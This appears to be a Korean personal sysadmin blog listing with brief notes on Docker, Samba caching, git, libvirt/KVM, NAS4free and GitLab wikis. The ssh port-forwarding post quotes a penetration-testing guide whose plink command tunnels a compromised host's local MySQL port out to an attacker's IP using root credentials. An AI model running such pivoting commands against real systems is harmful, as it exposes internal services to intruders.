'프로그램 사용'에 해당되는 글 2263건

  1. 2019.02.01 docker run = create + start
  2. 2019.02.01 smb 서비스 속도향상하기(SSD-bcache, AIO)
  3. 2019.01.29 git branch
  4. 2019.01.29 virbr0 - libvirt NIC
  5. 2019.01.28 ssh remote port forwarding
  6. 2019.01.28 virt-viewer for windows
  7. 2019.01.28 virt-manager 백업 및 복구
  8. 2019.01.28 NAS4free
  9. 2019.01.28 virt-manager
  10. 2019.01.28 gitlab wiki 2

docker run 이라고 기본 예제(?)로 도움말이 나와서

그걸로 했었는데 그렇게 하면 자꾸 증식하는 이유를 이제야 알았네..


 docker run 명령이 "create" 와 "start" 명령을 한번에 실행시키는 명령


[링크 : https://www.popit.kr/개발자가-처음-docker-접할때-오는-멘붕-몇가지/]

'프로그램 사용 > docker' 카테고리의 다른 글

docker 개념 다시 조사..  (0) 2019.02.01
docker 설명..  (0) 2019.02.01
docker howto  (4) 2018.11.23
docker static ip  (0) 2018.11.23
freebsd jail / docker  (0) 2015.07.27
Posted by 구차니

개발서버로 쓸때 NFS보단 smb가 무난할테니

smb write cache로 SSD를 쓰는 법이 있나 하고 찾아 보는데 bcache라는 녀석이 툭~ 튀어나왔다.

It turns out, both Linux and Windows now have the ability to use an SSD as a cache for a slower disk. The Linux version is called BCache and has been available since kernel 3.10 (available in Debian Jessie - Testing). 

[링크 : https://www.grepular.com/Disk_Caching_with_SSDs_Linux_and_Windows]


you can use BCache on Linux to enable caching of the file drive by using your SSD as a cache 

[링크 : https://askubuntu.com/questions/360257/how-to-cache-more-data-on-ssd-ram-to-avoid-spin-up]


Well, we got a bcache answer but no flashcache answer 

[링크 : https://askubuntu.com/questions/252140/how-do-i-install-and-use-flashcache-bcache-to-cache-hdd-to-ssd]


[링크 : https://www.phoronix.com/scan.php?page=article&item=linux414-bcache-raid&num=4] 벤치마크

[링크 : https://ganadist.github.io/2018_04_18_using_bcache.html] 설정

[링크 : https://wiki.archlinux.org/index.php/bcache] 도움말



음.. 그 외에 samba 설정에서 AIO 라는 녀석이 있나보네?

After looking at the samba configuration file I saw that Async IO (AIO) was not enabled by default. What AIO does is that it let’s Samba handle several file operations asynchronously. This can, at the expense of some CPU cycles, increase the performance quite a lot. 

[링크 : https://www.nixpal.com/make-samba-go-faster/]

'프로그램 사용 > SMB(Samba)' 카테고리의 다른 글

nas samba warn  (0) 2019.03.17
smb 와 selinux 설정  (0) 2019.02.14
samba acpi s3 wake up  (0) 2017.08.11
삼바 서버 자동 접속 끊기(timeout) - 검색중  (0) 2017.05.31
cups smb2 미지원?  (0) 2017.05.16
Posted by 구차니

브랜치 다시 도전.. ㅠㅠ

저번에 쓴건 먼가 운영을 잘못한 느낌이네..


[링크 : https://www.zerocho.com/category/Git/post/582342a73fbde700178771f5]

[링크 : https://www.zerocho.com/category/Git/post/582df1c8d349570018107477]

Posted by 구차니

libvirt에서 생성하는 녀석으로 보이는데 찾아봐야겠네..


[링크 : https://askubuntu.com/questions/246343/what-is-the-virbr0-interface-used-for]

[링크 : https://firstboos.tistory.com/entry/virbr0-인테페이스-비활성화-on-CentOS]

[링크 : https://linux.die.net/man/8/brctl]

'프로그램 사용 > kvm(virt-manager)' 카테고리의 다른 글

kvm qemu qcow2 vs raw with windows guest  (0) 2019.02.01
kvm 디스크 용량 늘리기 + 줄이기  (0) 2019.02.01
virt-viewer for windows  (0) 2019.01.28
virt-manager 백업 및 복구  (0) 2019.01.28
virt-manager  (0) 2019.01.28
Posted by 구차니

netstat에서 다음과 같은 신기한게 있어서 검색

sshd: root@pt 


아무튼.. 원격에서 ssh를 통해서 포트포워딩 해서 쓸 수 있도록 하는거 같은데..

한개의 포트라면 이게 더 깔끔 하려나?

Remote port forwarding

Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MYSQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as following:


Here is how you create a remote port forwarding:

ssh <gateway> -R <remote port to bind>:<local host>:<local port>


By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is 111.111.111.111.


Step 1 So on our compromised machine we do:

plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306


Step 2 Now we can check netstat on our attacking machine, we should see something like this:

tcp        0      0 127.0.0.1:3307          0.0.0.0:*               LISTEN      19392/sshd: root@pt

That means what we can connect to that port on the attacking machine from the attacking machine.


Step 3 Connect using the following command:

mysql -u root -p -h 127.0.0.1 --port=3307 


[링크 : https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html]

'프로그램 사용 > ssh scp sftp' 카테고리의 다른 글

ssh blowfish  (0) 2019.09.24
ssh tunnel proxy  (0) 2019.09.20
reverse SSH  (0) 2018.05.14
rpi vpn client  (0) 2018.05.11
scp: ambiguous target 에러  (0) 2016.09.21
Posted by 구차니

5900 이래서 VNC 인가 했는데.. SPICE 포트이기도 해서 한번 실행시도..

근데.. 외부로 접근 안열려 있는지 안되네.. 끄응...



[링크 : https://www.spice-space.org/download.html]

[링크 : https://virt-manager.org/download/]

[링크 : https://www.qnap.com/.../vm-콘솔에-연결하는-spice-클라이언트virt-뷰어를-사용하는-방법/]



+

centos 상에서는 아래와 같이 접속하면 되는데.. 윈도우에서 하면 왜 안될까...

외부 접속을 기본으로 막은걸까?

# remote-viewer spice://localhost:5900 

[링크 : https://www.spice-space.org/spice-user-manual.html]

[링크 : https://www.qnap.com/.../how-to-use-the-spice-client-virt-viewer-to-connect-to-a-vm-console/]



+

Display Spice에서 Address가 Localhost only가 기본값이라 외부 접속이 안된 듯 하다.


단, 해당 설정은 장비가 내려간 상황에서만 변경이 가능하므로,

VM 생성시 설정을 하거나, 서버를 내리고 설정을 변경해 주어야 한다.


[링크 : http://blog.seabow.pe.kr/?p=1286]


+

네트워크 설정이 문제인가 안되는건 매한가지 ㅠㅠ


+

firewalld 내리니까 잘된다..

망할 iptables가 아니라 이제 또 다른 놈이 생겼네 -_-

'프로그램 사용 > kvm(virt-manager)' 카테고리의 다른 글

kvm qemu qcow2 vs raw with windows guest  (0) 2019.02.01
kvm 디스크 용량 늘리기 + 줄이기  (0) 2019.02.01
virbr0 - libvirt NIC  (0) 2019.01.29
virt-manager 백업 및 복구  (0) 2019.01.28
virt-manager  (0) 2019.01.28
Posted by 구차니

KVM 이라고 그냥 표기하면 되려나?

아무튼 백업하고 복구하는 법 찾는중..


설정 자체가 XML로 되어있다 보니 어느걸 해야 하는거야...


[링크 : https://www.addictivetips.com/ubuntu-linux-tips/backup-a-virt-manager-virtual-machine-on-linux/]

[링크 : https://jaredkipe.com/blog/programming/general/ubuntu-kvm-5-backing-up-and-restoring-a-vm/]


+

2019.02.01

[링크 : https://www.virtkick.com/docs/how-to-restore-live-backup-on-kvm-virtual-machine.html]

[링크 : https://jaredkipe.com/blog/programming/general/ubuntu-kvm-5-backing-up-and-restoring-a-vm/]

'프로그램 사용 > kvm(virt-manager)' 카테고리의 다른 글

kvm qemu qcow2 vs raw with windows guest  (0) 2019.02.01
kvm 디스크 용량 늘리기 + 줄이기  (0) 2019.02.01
virbr0 - libvirt NIC  (0) 2019.01.29
virt-viewer for windows  (0) 2019.01.28
virt-manager  (0) 2019.01.28
Posted by 구차니
프로그램 사용/freeNAS2019. 1. 28. 13:14


[링크 : https://gigglehd.com/zbxe/12355614]


nas4free.org가 xigmanas.com 으로 리다이렉션 되는 듯?

[링크 : https://www.xigmanas.com/]

[링크 : http://www.nas4free.org/]

'프로그램 사용 > freeNAS' 카테고리의 다른 글

raidz1 (zfs)  (0) 2019.01.25
freeNAS hardware RAID, hot swap 등등..  (0) 2019.01.25
freeNAS web GUI  (2) 2019.01.25
Posted by 구차니



[링크 : https://virt-manager.org/]

[링크 : https://www.oss.kr/info_install/show/48cd8d88-a79a-4e86-a9b8-8b2abe4665ac]

'프로그램 사용 > kvm(virt-manager)' 카테고리의 다른 글

kvm qemu qcow2 vs raw with windows guest  (0) 2019.02.01
kvm 디스크 용량 늘리기 + 줄이기  (0) 2019.02.01
virbr0 - libvirt NIC  (0) 2019.01.29
virt-viewer for windows  (0) 2019.01.28
virt-manager 백업 및 복구  (0) 2019.01.28
Posted by 구차니
프로그램 사용/gitlab2019. 1. 28. 12:30

대충 보고 만져보는데

gitlab에서는 페이지 별로 생성하는게 아니라

링크를 생성후 따라가면서 생성하는 컨셉으로 사용이 가능한 듯

(wikipedia 처럼 페이지 생성하고 링크를 이어주는 개념이 아닌 듯)


[링크 : https://opentutorials.org/module/567/4941]


위키 페이지

[링크 : https://docs.gitlab.com/ee/user/project/wiki/]


마크다운(위키 문법)

[링크 : https://docs.gitlab.com/ee/user/markdown.html]



+

굳이 링크없이 만들고 싶다면 URL 에서 페이지 명을 치면 되긴 한다.

'프로그램 사용 > gitlab' 카테고리의 다른 글

gitlab 백업하기  (0) 2019.03.23
git push rejected by remote protected branch  (2) 2018.09.04
gitlab  (2) 2018.08.13
Posted by 구차니